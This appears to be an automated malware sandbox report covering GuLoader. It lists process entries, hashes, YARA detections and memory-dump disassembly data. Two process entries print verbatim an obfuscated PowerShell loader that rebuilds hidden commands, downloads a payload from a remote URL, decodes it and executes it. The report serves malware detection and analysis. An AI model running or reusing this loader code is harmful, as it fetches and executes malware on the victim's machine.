                                Commandline:"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" " <#Stelography Boligministerielt Surterhvervet Polenkas #>;$Genforeningerne='Brasilianske';<#Decoloriser Quatrains dksmands Rentabelt #>;$Stvregne=$Orlos+$host.UI; function Udgangstilladelsernes($Lupulus){If ($Stvregne) {$setaria++;}$Revest=$Velkomstens74+$Lupulus.'Length'-$setaria; for( $Kropsvisiteret=4;$Kropsvisiteret -lt $Revest;$Kropsvisiteret+=5){$Spoilage=$Kropsvisiteret;$Salvelsesfuldest+=$Lupulus[$Kropsvisiteret];$Prototraitor='Kronvildtjagterne';}$Salvelsesfuldest;}function Skilleliniens($Knothead){ & ($Toilettaskens) ($Knothead);}$Tastetryk=Udgangstilladelsernes 'guttM ndsoUn uzPoliiCanal I clvotaaDavi/ Pen ';$Tastetryk+=Udgangstilladelsernes 'Quar5Skyd.mine0Love Ski.(Li nWFejliMul nFabrdudklo NanwF.ans a,a ProcNB,geT,lie Stem1Udru0 Dr,.Roug0Raci;Phra OffiWCensiRiddnNatu6Oakl4Be i;Ne.r FenaxOver6Ea t4Ur n;Nume UrinrGyptvFili:sta,1 Eff3Dest1Clee.Disa0Tred)Fi a HandG noneYellcJustk Siso,rep/Frod2 Sto0H.ms1Stil0Gest0 P.o1Cert0Wi t1Buri DyreFSelviDubbr G,ueH,mpf tr oUmorxL,du/Defl1conv3Post1N ws.Sikk0 Bog ';$Cellerne=Udgangstilladelsernes 'EmbrUO bys OppeQuarrErog-surfA ukkgBro E ivsN fortigna ';$Konstruktivt=Udgangstilladelsernes 'Gru.haf,at ArttB depKachsHoo,:Flit/Be.a/ GamsBatiyH lvnDeuteMa ipFinu.Fl trTohaoBef./SkosLQuacySpecsActib trgaSandd vov. 
PaupStr sS,anpSkij ';$Kropsvisiteretndarbejde97=Udgangstilladelsernes 'Olde>Gang ';$Toilettaskens=Udgangstilladelsernes ' ympI .ree Sa.x Raf ';$Lykkejgers='Spendynr';$Proconscriptive='\Udviklingsegnes.sep';Skilleliniens (Udgangstilladelsernes ' npa$Fuyeg Cu le,acoNaivbFinaAAkvaLTr,n:O.lltCytoAIdeamFra B Ud UUn,rRChicSBlse=Ozon$ kreSkanNP lwvGlas: staA St PWordP La D AliASn.wt P.laU,fr+trau$frynpGnisr ,enoAppecDuelO.enenKgeusF.rhC r nrOarliclump FleTswo iLym.vRefeETysk ');Skilleliniens (Udgangstilladelsernes 'Arbe$Forbg PenlHandoMinuBFackaLa sL Bil: UnmKgardOIndod eneELan k aresA skEK.ogrOml.=Bajo$Kl pknarcoCraiNSy gSChert PrerUnusUPr.lKPrint s aI ealvsammTAkti.AnidsChe,pThyml N nIOpe.TTrun(Hoo $svinkUn.orChecO no pTilfS F,rVSvinifadeS .ryiBeriTStroeAntiR .elEnoncTskifN FerDForpa.ildRGipsBSan eDampj ForDMelaEJor 9Disi7Insi)Star ');Skilleliniens (Udgangstilladelsernes ' Nov[,ufonfjldE RovtEjen.SextshunkE Marr Genv .kki C,nCDi heBronP,kspoGadiIFrowNtndit,algMInf AEkspNVeneABallg UngeFastr Gre]Wa.r:U,co: molSApplE KogC ,unuAnteRReaniDm,iT CarYKrafp E.er nheoGardtLauroTahacCivioNighLLump Rang=Outb ,usk[ StaN A.hE Ovet Wif.GcelSFormeBondc,andUS ilRArtoI ukkTToroYParoPdolorSubpOPreitcheeoFrieCSrskOLserl OddTunfoYD ospSkypeEksp]Sg f: amm:Dry,tPomeLaddos nab1Dila2 le ');$Konstruktivt=$Kodekser[0];$Slbemaalsflyvningens=(Udgangstilladelsernes 'Buat$,utwgVineLLs lO ,aaBMuriaGravLT.ia:up om TusEDrabsNondOPoluSDat.TRoofeSperTGarrHVir,i racuEmpimBol,= OstNAndre K sW Da -S orODefebNonpj phEFedeC N dTpara BadeSPermYLmleS enotfiltEPretmHj i. F rnWin eMar.T Rec. 
llewPosteAgnobKarmcudtolPl ai eae ,ldNAf,itHype ');Skilleliniens ($Slbemaalsflyvningens);Skilleliniens (Udgangstilladelsernes 'Indb$UntoMInhueSlags AfvoN das clatCh.pe Glut Indh lloi AkkuIn emIntr.TrolHGrateLeukaNvn,d aadeFjolrKnurs,oti[ els$Rep,C rane,alelForklErg eSvejrSrgenHyp eStam]Nico=Br s$PligTUdr aHvedsJ.rdtMaadeor rtConcrUnafyT iwkHenr ');$Egidias=Udgangstilladelsernes 'Fjer$ WheMSynteJo vsInosoZinasReast SyseCap.t Fdeh Rrei.nteuCocimcolo.Hun.DVocio endw entnOystlHelhoKommaskged atrFExaniOrphlJinge Po,(Acli$SnreK S roLoitnPernsBe,zt DisrSputuEddikEbb,tPolli HjevLuftt,kit, omb$ PleS TreuMisbbDrukcFallaGe,en FoodHen iKaradId.nl M syRaba)Kom ';$Subcandidly=$Tamburs;Skilleliniens (Udgangstilladelsernes 'Si s$GlobGVintL ecooParaB SelAS.enlHalv: FrucI oleRampME,asBBib aPhloLTossoWaxeeD gfTL anSFibr=Unfi(TidstIdeaeRevns asktLev -Gar P ,ida.dreTUrolH da Semi$PinsSKlupuElecBRur.cInteaSam n ndsdsl mIAkusD ,hol emiYTele)I fa ');while (!$Cembaloets) {Skilleliniens (Udgangstilladelsernes ' Jua$ H pgStralWitooC.rkbK,lvaPesslFo d:PrinSvi etTilboTaabcIntekVejpaO sld Re,iVir n.issg Und= A,t$SylttflokrOut uRi,eeCoul ') ;Skilleliniens $Egidias;Skilleliniens (Udgangstilladelsernes 'Bryas ocTRefeAJourRunmatApp,-SecuSSubllPoi EPreeEMonkPRenn A ge4Chia ');Skilleliniens (Udgangstilladelsernes 'Noni$a nuGU deLK,ttOhjfrbJar,A .reLRaad:kersCNjereRab MPre bStarARentlFailoRevaE D,gTAfviSthra=T an(Sigtt.iscE Ha S.ubwt Mo,-T mipSta,AUganTEntrhUnfo Sm $SvmmSBibeu GrnB crCHi tAPr cn jasdU.coiSimeDSkriLpappY ild)Nulp ') ;Skilleliniens (Udgangstilladelsernes 'Twan$HovegAstrlBiblohjreBUdl.AHallL agk:ServT geoMng,X CalI S oFbur YSulp2Euka2plun1 tra=Fje $FragGUnziLOveroFittBLagea Nv l A,f: enN M riMycotSe.spIndkiOndsCHa.hkKno.EEn idEmbi+Skin+Sa l%Inds$SphikBsnioSciadTincEUn iKBespSTjrpeE,isrCoif.AdmiC enloRa.kuIvaonPensTLide ') ;$Konstruktivt=$Kodekser[$Toxify221];}$Solidare=303621;$Polyadelph=30134;Skilleliniens (Udgangstilladelsernes 'Twa,$Di.gGStreLbyraoblombbr dASk,dLSalg:ListrFdebe 
aprgunvinHypoSAn,lk PusaCalibHjersBesgppejkRTun iCaconKartCV ctI perPstanp BenEUnflRRhinsPalm E t=Genn dieGIndrER ftTAb f-D scCLgeroJok NLor T ,edE OvenPartTAnon Pas$TnkesSkabU o,ebO,erc utoaBillN R vDNeigiServD Erll U.vyLuti ');Skilleliniens (Udgangstilladelsernes 'Malk$HavngPrislTessoPelvb IsoaHydrlOrdm:.teePlo ieAwaraSkifcFilsh blilFlasiM nikMacre Smi Lo,e=E jo Detr[Frg SFlngyRespsEnertUmbieE lym on.Se rCClamoDiscn L,avHu teHunkr PertAcco] ,ve:In,e:SproF uborSkyjo,ohemI agBRaadaSynasBroeeForl6Lage4Con SK ngt Kl r KamiCampnPlagg Pa (reol$EkspRLorieOutcg IgnnFo ksReagkKrimaOd nbParasAdreplnrerNonciGrannF.rac Heri arlpWindpTreveSen rNybysDyst)Pana ');Skilleliniens (Udgangstilladelsernes 'Sana$parcGStedLRevlOLgeub B aa AfkL Ket:F akTCarbIT anlLives isckUdvlRmycee.andRspris Bl ABlo.k ApiS Vole unnpy.rE UniSDoms7Angl7Unde nonc= Fru Pedu[MortS NriYInv SRaveTTin.EHun mBead.AmenTBecheE ogxJudet Gha. ExaEEp,xN sweCSoldOAbenDFlodiDyrtNUni.GIndd]S ep:Myos:NonhA B lSSistCDesaIToniI,ale. Bl G HelE MamtSynesSha.t,ovgR Ty.i StenRin gUnsy(Htbl$MeatPHeteeMet ADer CUsarhEmb L Thoi rioKHldne Ind) Tri ');Skilleliniens (Udgangstilladelsernes 'Squi$TaxiGUdd lKommoEntrBOperAKasklParf:Jun u ornMinuT imiUE emFK ostBandeBuredMe.a= la$ BefTFastIRewaLsyndsPillkMashrAmt eTi.frHavesSpeaA T ikOverSHv,dEKritnRo kE fssSe,i7Dech7Caus.N,nnsDan UFiskB KotsRg ot ndRultriUbalN.araG Whi( al$ HagsUdtrointelUgesi TrsDUndeaTranrbl ee Phe, Bur$Ark.pPit OQu flIndkY Palalownd .uoeM sslKastPB seHOp r)Sup. ');Skilleliniens $Untufted;"
                                Imagebase:0x7ff7be880000
                                File size:452'608 bytes
                                MD5 hash:04029E121A0CFA5991749937DD22A1D9
                                Has elevated privileges:false
                                Has administrator privileges:false
                                Programmed in:C, C++ or other language
                                Yara matches:
                                • Rule: JoeSecurity_GuLoader_5, Description: Yara detected GuLoader, Source: 00000004.00000002.2187936200.0000028025C7E000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                Reputation:high
                                Has exited:true

                                Target ID:5
                                Start time:05:30:13
                                Start date:23/10/2024
                                Path:C:\Windows\System32\conhost.exe
                                Wow64 process (32bit):false
                                Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                Imagebase:0x7ff6d64d0000
                                File size:862'208 bytes
                                MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                Has elevated privileges:false
                                Has administrator privileges:false
                                Programmed in:C, C++ or other language
                                Reputation:high
                                Has exited:true

                                Target ID:6
                                Start time:05:30:22
                                Start date:23/10/2024
                                Path:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                Wow64 process (32bit):true
                                Commandline:"C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe" " <#Stelography Boligministerielt Surterhvervet Polenkas #>;$Genforeningerne='Brasilianske';<#Decoloriser Quatrains dksmands Rentabelt #>;$Stvregne=$Orlos+$host.UI; function Udgangstilladelsernes($Lupulus){If ($Stvregne) {$setaria++;}$Revest=$Velkomstens74+$Lupulus.'Length'-$setaria; for( $Kropsvisiteret=4;$Kropsvisiteret -lt $Revest;$Kropsvisiteret+=5){$Spoilage=$Kropsvisiteret;$Salvelsesfuldest+=$Lupulus[$Kropsvisiteret];$Prototraitor='Kronvildtjagterne';}$Salvelsesfuldest;}function Skilleliniens($Knothead){ & ($Toilettaskens) ($Knothead);}$Tastetryk=Udgangstilladelsernes 'guttM ndsoUn uzPoliiCanal I clvotaaDavi/ Pen ';$Tastetryk+=Udgangstilladelsernes 'Quar5Skyd.mine0Love Ski.(Li nWFejliMul nFabrdudklo NanwF.ans a,a ProcNB,geT,lie Stem1Udru0 Dr,.Roug0Raci;Phra OffiWCensiRiddnNatu6Oakl4Be i;Ne.r FenaxOver6Ea t4Ur n;Nume UrinrGyptvFili:sta,1 Eff3Dest1Clee.Disa0Tred)Fi a HandG noneYellcJustk Siso,rep/Frod2 Sto0H.ms1Stil0Gest0 P.o1Cert0Wi t1Buri DyreFSelviDubbr G,ueH,mpf tr oUmorxL,du/Defl1conv3Post1N ws.Sikk0 Bog ';$Cellerne=Udgangstilladelsernes 'EmbrUO bys OppeQuarrErog-surfA ukkgBro E ivsN fortigna ';$Konstruktivt=Udgangstilladelsernes 'Gru.haf,at ArttB depKachsHoo,:Flit/Be.a/ GamsBatiyH lvnDeuteMa ipFinu.Fl trTohaoBef./SkosLQuacySpecsActib trgaSandd vov. 
PaupStr sS,anpSkij ';$Kropsvisiteretndarbejde97=Udgangstilladelsernes 'Olde>Gang ';$Toilettaskens=Udgangstilladelsernes ' ympI .ree Sa.x Raf ';$Lykkejgers='Spendynr';$Proconscriptive='\Udviklingsegnes.sep';Skilleliniens (Udgangstilladelsernes ' npa$Fuyeg Cu le,acoNaivbFinaAAkvaLTr,n:O.lltCytoAIdeamFra B Ud UUn,rRChicSBlse=Ozon$ kreSkanNP lwvGlas: staA St PWordP La D AliASn.wt P.laU,fr+trau$frynpGnisr ,enoAppecDuelO.enenKgeusF.rhC r nrOarliclump FleTswo iLym.vRefeETysk ');Skilleliniens (Udgangstilladelsernes 'Arbe$Forbg PenlHandoMinuBFackaLa sL Bil: UnmKgardOIndod eneELan k aresA skEK.ogrOml.=Bajo$Kl pknarcoCraiNSy gSChert PrerUnusUPr.lKPrint s aI ealvsammTAkti.AnidsChe,pThyml N nIOpe.TTrun(Hoo $svinkUn.orChecO no pTilfS F,rVSvinifadeS .ryiBeriTStroeAntiR .elEnoncTskifN FerDForpa.ildRGipsBSan eDampj ForDMelaEJor 9Disi7Insi)Star ');Skilleliniens (Udgangstilladelsernes ' Nov[,ufonfjldE RovtEjen.SextshunkE Marr Genv .kki C,nCDi heBronP,kspoGadiIFrowNtndit,algMInf AEkspNVeneABallg UngeFastr Gre]Wa.r:U,co: molSApplE KogC ,unuAnteRReaniDm,iT CarYKrafp E.er nheoGardtLauroTahacCivioNighLLump Rang=Outb ,usk[ StaN A.hE Ovet Wif.GcelSFormeBondc,andUS ilRArtoI ukkTToroYParoPdolorSubpOPreitcheeoFrieCSrskOLserl OddTunfoYD ospSkypeEksp]Sg f: amm:Dry,tPomeLaddos nab1Dila2 le ');$Konstruktivt=$Kodekser[0];$Slbemaalsflyvningens=(Udgangstilladelsernes 'Buat$,utwgVineLLs lO ,aaBMuriaGravLT.ia:up om TusEDrabsNondOPoluSDat.TRoofeSperTGarrHVir,i racuEmpimBol,= OstNAndre K sW Da -S orODefebNonpj phEFedeC N dTpara BadeSPermYLmleS enotfiltEPretmHj i. F rnWin eMar.T Rec. 
llewPosteAgnobKarmcudtolPl ai eae ,ldNAf,itHype ');Skilleliniens ($Slbemaalsflyvningens);Skilleliniens (Udgangstilladelsernes 'Indb$UntoMInhueSlags AfvoN das clatCh.pe Glut Indh lloi AkkuIn emIntr.TrolHGrateLeukaNvn,d aadeFjolrKnurs,oti[ els$Rep,C rane,alelForklErg eSvejrSrgenHyp eStam]Nico=Br s$PligTUdr aHvedsJ.rdtMaadeor rtConcrUnafyT iwkHenr ');$Egidias=Udgangstilladelsernes 'Fjer$ WheMSynteJo vsInosoZinasReast SyseCap.t Fdeh Rrei.nteuCocimcolo.Hun.DVocio endw entnOystlHelhoKommaskged atrFExaniOrphlJinge Po,(Acli$SnreK S roLoitnPernsBe,zt DisrSputuEddikEbb,tPolli HjevLuftt,kit, omb$ PleS TreuMisbbDrukcFallaGe,en FoodHen iKaradId.nl M syRaba)Kom ';$Subcandidly=$Tamburs;Skilleliniens (Udgangstilladelsernes 'Si s$GlobGVintL ecooParaB SelAS.enlHalv: FrucI oleRampME,asBBib aPhloLTossoWaxeeD gfTL anSFibr=Unfi(TidstIdeaeRevns asktLev -Gar P ,ida.dreTUrolH da Semi$PinsSKlupuElecBRur.cInteaSam n ndsdsl mIAkusD ,hol emiYTele)I fa ');while (!$Cembaloets) {Skilleliniens (Udgangstilladelsernes ' Jua$ H pgStralWitooC.rkbK,lvaPesslFo d:PrinSvi etTilboTaabcIntekVejpaO sld Re,iVir n.issg Und= A,t$SylttflokrOut uRi,eeCoul ') ;Skilleliniens $Egidias;Skilleliniens (Udgangstilladelsernes 'Bryas ocTRefeAJourRunmatApp,-SecuSSubllPoi EPreeEMonkPRenn A ge4Chia ');Skilleliniens (Udgangstilladelsernes 'Noni$a nuGU deLK,ttOhjfrbJar,A .reLRaad:kersCNjereRab MPre bStarARentlFailoRevaE D,gTAfviSthra=T an(Sigtt.iscE Ha S.ubwt Mo,-T mipSta,AUganTEntrhUnfo Sm $SvmmSBibeu GrnB crCHi tAPr cn jasdU.coiSimeDSkriLpappY ild)Nulp ') ;Skilleliniens (Udgangstilladelsernes 'Twan$HovegAstrlBiblohjreBUdl.AHallL agk:ServT geoMng,X CalI S oFbur YSulp2Euka2plun1 tra=Fje $FragGUnziLOveroFittBLagea Nv l A,f: enN M riMycotSe.spIndkiOndsCHa.hkKno.EEn idEmbi+Skin+Sa l%Inds$SphikBsnioSciadTincEUn iKBespSTjrpeE,isrCoif.AdmiC enloRa.kuIvaonPensTLide ') ;$Konstruktivt=$Kodekser[$Toxify221];}$Solidare=303621;$Polyadelph=30134;Skilleliniens (Udgangstilladelsernes 'Twa,$Di.gGStreLbyraoblombbr dASk,dLSalg:ListrFdebe 
aprgunvinHypoSAn,lk PusaCalibHjersBesgppejkRTun iCaconKartCV ctI perPstanp BenEUnflRRhinsPalm E t=Genn dieGIndrER ftTAb f-D scCLgeroJok NLor T ,edE OvenPartTAnon Pas$TnkesSkabU o,ebO,erc utoaBillN R vDNeigiServD Erll U.vyLuti ');Skilleliniens (Udgangstilladelsernes 'Malk$HavngPrislTessoPelvb IsoaHydrlOrdm:.teePlo ieAwaraSkifcFilsh blilFlasiM nikMacre Smi Lo,e=E jo Detr[Frg SFlngyRespsEnertUmbieE lym on.Se rCClamoDiscn L,avHu teHunkr PertAcco] ,ve:In,e:SproF uborSkyjo,ohemI agBRaadaSynasBroeeForl6Lage4Con SK ngt Kl r KamiCampnPlagg Pa (reol$EkspRLorieOutcg IgnnFo ksReagkKrimaOd nbParasAdreplnrerNonciGrannF.rac Heri arlpWindpTreveSen rNybysDyst)Pana ');Skilleliniens (Udgangstilladelsernes 'Sana$parcGStedLRevlOLgeub B aa AfkL Ket:F akTCarbIT anlLives isckUdvlRmycee.andRspris Bl ABlo.k ApiS Vole unnpy.rE UniSDoms7Angl7Unde nonc= Fru Pedu[MortS NriYInv SRaveTTin.EHun mBead.AmenTBecheE ogxJudet Gha. ExaEEp,xN sweCSoldOAbenDFlodiDyrtNUni.GIndd]S ep:Myos:NonhA B lSSistCDesaIToniI,ale. Bl G HelE MamtSynesSha.t,ovgR Ty.i StenRin gUnsy(Htbl$MeatPHeteeMet ADer CUsarhEmb L Thoi rioKHldne Ind) Tri ');Skilleliniens (Udgangstilladelsernes 'Squi$TaxiGUdd lKommoEntrBOperAKasklParf:Jun u ornMinuT imiUE emFK ostBandeBuredMe.a= la$ BefTFastIRewaLsyndsPillkMashrAmt eTi.frHavesSpeaA T ikOverSHv,dEKritnRo kE fssSe,i7Dech7Caus.N,nnsDan UFiskB KotsRg ot ndRultriUbalN.araG Whi( al$ HagsUdtrointelUgesi TrsDUndeaTranrbl ee Phe, Bur$Ark.pPit OQu flIndkY Palalownd .uoeM sslKastPB seHOp r)Sup. ');Skilleliniens $Untufted;"
                                Imagebase:0xd60000
                                File size:433'152 bytes
                                MD5 hash:C32CA4ACFCC635EC1EA6ED8A34DF5FAC
                                Has elevated privileges:false
                                Has administrator privileges:false
                                Programmed in:C, C++ or other language
                                Yara matches:
                                • Rule: JoeSecurity_GuLoader_5, Description: Yara detected GuLoader, Source: 00000006.00000002.3353773662.00000000084D0000.00000040.00001000.00020000.00000000.sdmp, Author: Joe Security
                                • Rule: JoeSecurity_GuLoader_2, Description: Yara detected GuLoader, Source: 00000006.00000002.3353948398.000000000C936000.00000040.00001000.00020000.00000000.sdmp, Author: Joe Security
                                • Rule: JoeSecurity_GuLoader_5, Description: Yara detected GuLoader, Source: 00000006.00000002.3340409959.0000000005886000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                Reputation:high
                                Has exited:false

                                Target ID:7
                                Start time:05:30:22
                                Start date:23/10/2024
                                Path:C:\Windows\System32\conhost.exe
                                Wow64 process (32bit):false
                                Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                Imagebase:0x7ff6d64d0000
                                File size:862'208 bytes
                                MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                Has elevated privileges:false
                                Has administrator privileges:false
                                Programmed in:C, C++ or other language
                                Reputation:high
                                Has exited:false

                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000004.00000002.2203679900.00007FF848BD0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848BD0000, based on PE: false
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_4_2_7ff848bd0000_powershell.jbxd
                                  Similarity
                                  • API ID:
                                  • String ID: $Z$$Z
                                  • API String ID: 0-2706988786
                                  • Opcode ID: 54e55ffc31d06fe2b8f887c71d0bcde1d8efa2e29af4effa28b13036ffd839fd
                                  • Instruction ID: 403c8b9572c51f7af47c2c187e0a59bb16ea4da9346239d6ba5da39f5fa4de48
                                  • Opcode Fuzzy Hash: 54e55ffc31d06fe2b8f887c71d0bcde1d8efa2e29af4effa28b13036ffd839fd
                                  • Instruction Fuzzy Hash: D0F1B33190CA8E8FEBA8EF28C8557E937D1FF54350F14426EE84DC7695DB38A8418B81
                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000004.00000002.2203679900.00007FF848BD0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848BD0000, based on PE: false
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_4_2_7ff848bd0000_powershell.jbxd
                                  Similarity
                                  • API ID:
                                  • String ID: $Z$$Z
                                  • API String ID: 0-2706988786
                                  • Opcode ID: 7622f97b5fcfb2de560b62e9ed6bc048ffba4f0e978d1cb49b585383194b6ede
                                  • Instruction ID: a96d253d2352cde37a7b02030924459dcdf59890e0eda82f9b749c4e84daf28a
                                  • Opcode Fuzzy Hash: 7622f97b5fcfb2de560b62e9ed6bc048ffba4f0e978d1cb49b585383194b6ede
                                  • Instruction Fuzzy Hash: 85F1C03090CA8E8FEBA9EF28C8557E977D1EF54350F14426EE84DC7691DF78A8418B81
                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000004.00000002.2203679900.00007FF848BD0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848BD0000, based on PE: false
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_4_2_7ff848bd0000_powershell.jbxd
                                  Similarity
                                  • API ID:
                                  • String ID: 0kH$PmH
                                  • API String ID: 0-3858910588
                                  • Opcode ID: 25d467517979cbc8cc540a500e42425e2757d4a76a55a91e2240d42864376184
                                  • Instruction ID: e811cc66ed6fe958cba9f58fbec298d17ab874741ba48a71ec8cc37fb7d9b0c2
                                  • Opcode Fuzzy Hash: 25d467517979cbc8cc540a500e42425e2757d4a76a55a91e2240d42864376184
                                  • Instruction Fuzzy Hash: 45C17C30A1894E8FDF98EF5CC485AE977E1FF68350F14416AD409D7296DB34E882CB80
                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000004.00000002.2203679900.00007FF848BD0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848BD0000, based on PE: false
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_4_2_7ff848bd0000_powershell.jbxd
                                  Similarity
                                  • API ID:
                                  • String ID: $Z$$Z
                                  • API String ID: 0-2706988786
                                  • Opcode ID: 6f08dbfc5dcc5d33c3a7cf002ad3de5de69d57ffb5051ded244ca3a4ae08c872
                                  • Instruction ID: 825538b0bf7b7a155c2fbc18a89ddeba4b4b815b34ced24ae9e88999a1b1280f
                                  • Opcode Fuzzy Hash: 6f08dbfc5dcc5d33c3a7cf002ad3de5de69d57ffb5051ded244ca3a4ae08c872
                                  • Instruction Fuzzy Hash: E9B1C23090CA8D8FEBA8EF28D8557E93BD1FF55350F04426EE84DC7692DB3498458B86
                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000004.00000002.2204687924.00007FF848CA0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848CA0000, based on PE: false
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_4_2_7ff848ca0000_powershell.jbxd
                                  Similarity
                                  • API ID:
                                  • String ID: h"H$h"H
                                  • API String ID: 0-717975129
                                  • Opcode ID: 9209e25316e2c25916cf4939886f8edd76ccee9cfed211df1a8a646f7e9f2df6
                                  • Instruction ID: 1324cbc72e6b45617f2a5c0d5d85017f5ba4445e2016533a3b614f2a0661c3d8
                                  • Opcode Fuzzy Hash: 9209e25316e2c25916cf4939886f8edd76ccee9cfed211df1a8a646f7e9f2df6
                                  • Instruction Fuzzy Hash: CF41F332A0DB898FEBE5EB289841AB97BE1EF55350F0801BBC40DC7193DE19A848C355
                                  Memory Dump Source
                                  • Source File: 00000004.00000002.2203679900.00007FF848BD0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848BD0000, based on PE: false
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_4_2_7ff848bd0000_powershell.jbxd
                                  Similarity
                                  • API ID:
                                  • String ID:
                                  • API String ID:
                                  • Opcode ID: 0d87c7fa6685b2fd95693a5ebc5acbf8491d637b8ab1c4f2c9827ac0cf896d14
                                  • Instruction ID: 0f2ad00b0b1ca3aa55f222357227dcf635699923790fea9bf525b50994fd212b
                                  • Opcode Fuzzy Hash: 0d87c7fa6685b2fd95693a5ebc5acbf8491d637b8ab1c4f2c9827ac0cf896d14
                                  • Instruction Fuzzy Hash: 69F18E30A1CA4D9FDF98EF1CC495AA97BE1FFA8340F14016AE449D7295CB34E881CB85
                                  Memory Dump Source
                                  • Source File: 00000004.00000002.2204687924.00007FF848CA0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848CA0000, based on PE: false
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_4_2_7ff848ca0000_powershell.jbxd
                                  Similarity
                                  • API ID:
                                  • String ID:
                                  • API String ID:
                                  • Opcode ID: 3042c8c361a6bdfa0330aa9841cb59c5c92e7dae4254deb5a18f1268c7220fc5
                                  • Instruction ID: 1184648a05fc35829b1b87aeb068716418f88d02a058860f208d7dcc3183287b
                                  • Opcode Fuzzy Hash: 3042c8c361a6bdfa0330aa9841cb59c5c92e7dae4254deb5a18f1268c7220fc5
                                  • Instruction Fuzzy Hash: 0CE10432E0EB855FE799EB2898552B9BBE2EF55650F0801BEC04CC71D3DE28AC458356
                                  Memory Dump Source
                                  • Source File: 00000004.00000002.2204687924.00007FF848CA0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848CA0000, based on PE: false
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_4_2_7ff848ca0000_powershell.jbxd
                                  Similarity
                                  • API ID:
                                  • String ID:
                                  • API String ID:
                                  • Opcode ID: 31d4c256e2f7d39903d7dca0403d7b1484909cb1474f8a358cd3e18c4e3f0fd2
                                  • Instruction ID: cae4e4ed1a405496f2e2b0843f05a211f7b8b1fa825621fedf1285a3219e9331
                                  • Opcode Fuzzy Hash: 31d4c256e2f7d39903d7dca0403d7b1484909cb1474f8a358cd3e18c4e3f0fd2
                                  • Instruction Fuzzy Hash: 66E11432E0DB865FE799EB2898552B977E2EF55660F0801BEC00DC71C3DE29AC858746
                                  Memory Dump Source
                                  • Source File: 00000004.00000002.2204687924.00007FF848CA0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848CA0000, based on PE: false
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_4_2_7ff848ca0000_powershell.jbxd
                                  Similarity
                                  • API ID:
                                  • String ID:
                                  • API String ID:
                                  • Opcode ID: 1a4dd65416550904e60f9c840e64254e15b684f2b615f174994e75840b0199ae
                                  • Instruction ID: 15438a0cd76f20178384c808af56ee956a950a2fce53f4dfc878e17ab9853a71
                                  • Opcode Fuzzy Hash: 1a4dd65416550904e60f9c840e64254e15b684f2b615f174994e75840b0199ae
                                  • Instruction Fuzzy Hash: 31B14432E1EB8A4FE7D5EBAC98556B97BE0EF562A0F0841FAC00DC71D3DA189C058355
                                  Memory Dump Source
                                  • Source File: 00000004.00000002.2204687924.00007FF848CA0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848CA0000, based on PE: false
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_4_2_7ff848ca0000_powershell.jbxd
                                  Similarity
                                  • API ID:
                                  • String ID:
                                  • API String ID:
                                  • Opcode ID: 51666dbde8f7d93045044a33048b4aebf15db6b6c65053094d03933046130bcb
                                  • Instruction ID: fd310d3b331c73bc0d9d1686e905b92d01607176f547670d51b00a3029f01f64
                                  • Opcode Fuzzy Hash: 51666dbde8f7d93045044a33048b4aebf15db6b6c65053094d03933046130bcb
                                  • Instruction Fuzzy Hash: EA91F431E1EB8A4FE7D9EB2C68562B976D1EF457A0F44017ED40DC3993EE18AC11824A
                                  Memory Dump Source
                                  • Source File: 00000004.00000002.2204687924.00007FF848CA0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848CA0000, based on PE: false
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_4_2_7ff848ca0000_powershell.jbxd
                                  Similarity
                                  • API ID:
                                  • String ID:
                                  • API String ID:
                                  • Opcode ID: 7870ba4ae692e897e9af2888dec6fc83352b31d3a8f11b6122aba7f26650f16c
                                  • Instruction ID: cde69b2b9dcb81cb36fda0bb27eeb5944d139c5963c1aec1f2292ae70f29bb5d
                                  • Opcode Fuzzy Hash: 7870ba4ae692e897e9af2888dec6fc83352b31d3a8f11b6122aba7f26650f16c
                                  • Instruction Fuzzy Hash: 7C71E632E4EB895FE796E62868556B57BE1EF42254F0800FBD08DC70A3EE196C068356
                                  Memory Dump Source
                                  • Source File: 00000004.00000002.2204687924.00007FF848CA0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848CA0000, based on PE: false
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_4_2_7ff848ca0000_powershell.jbxd
                                  Similarity
                                  • API ID:
                                  • String ID:
                                  • API String ID:
                                  • Opcode ID: 7c344b526234058ceefd08377788474415c761fc56d4041d682607984d3b2f64
                                  • Instruction ID: 3a599f5e95fe815b102003bdaeb160afdad06b0360277794dd4ef863d37d7f88
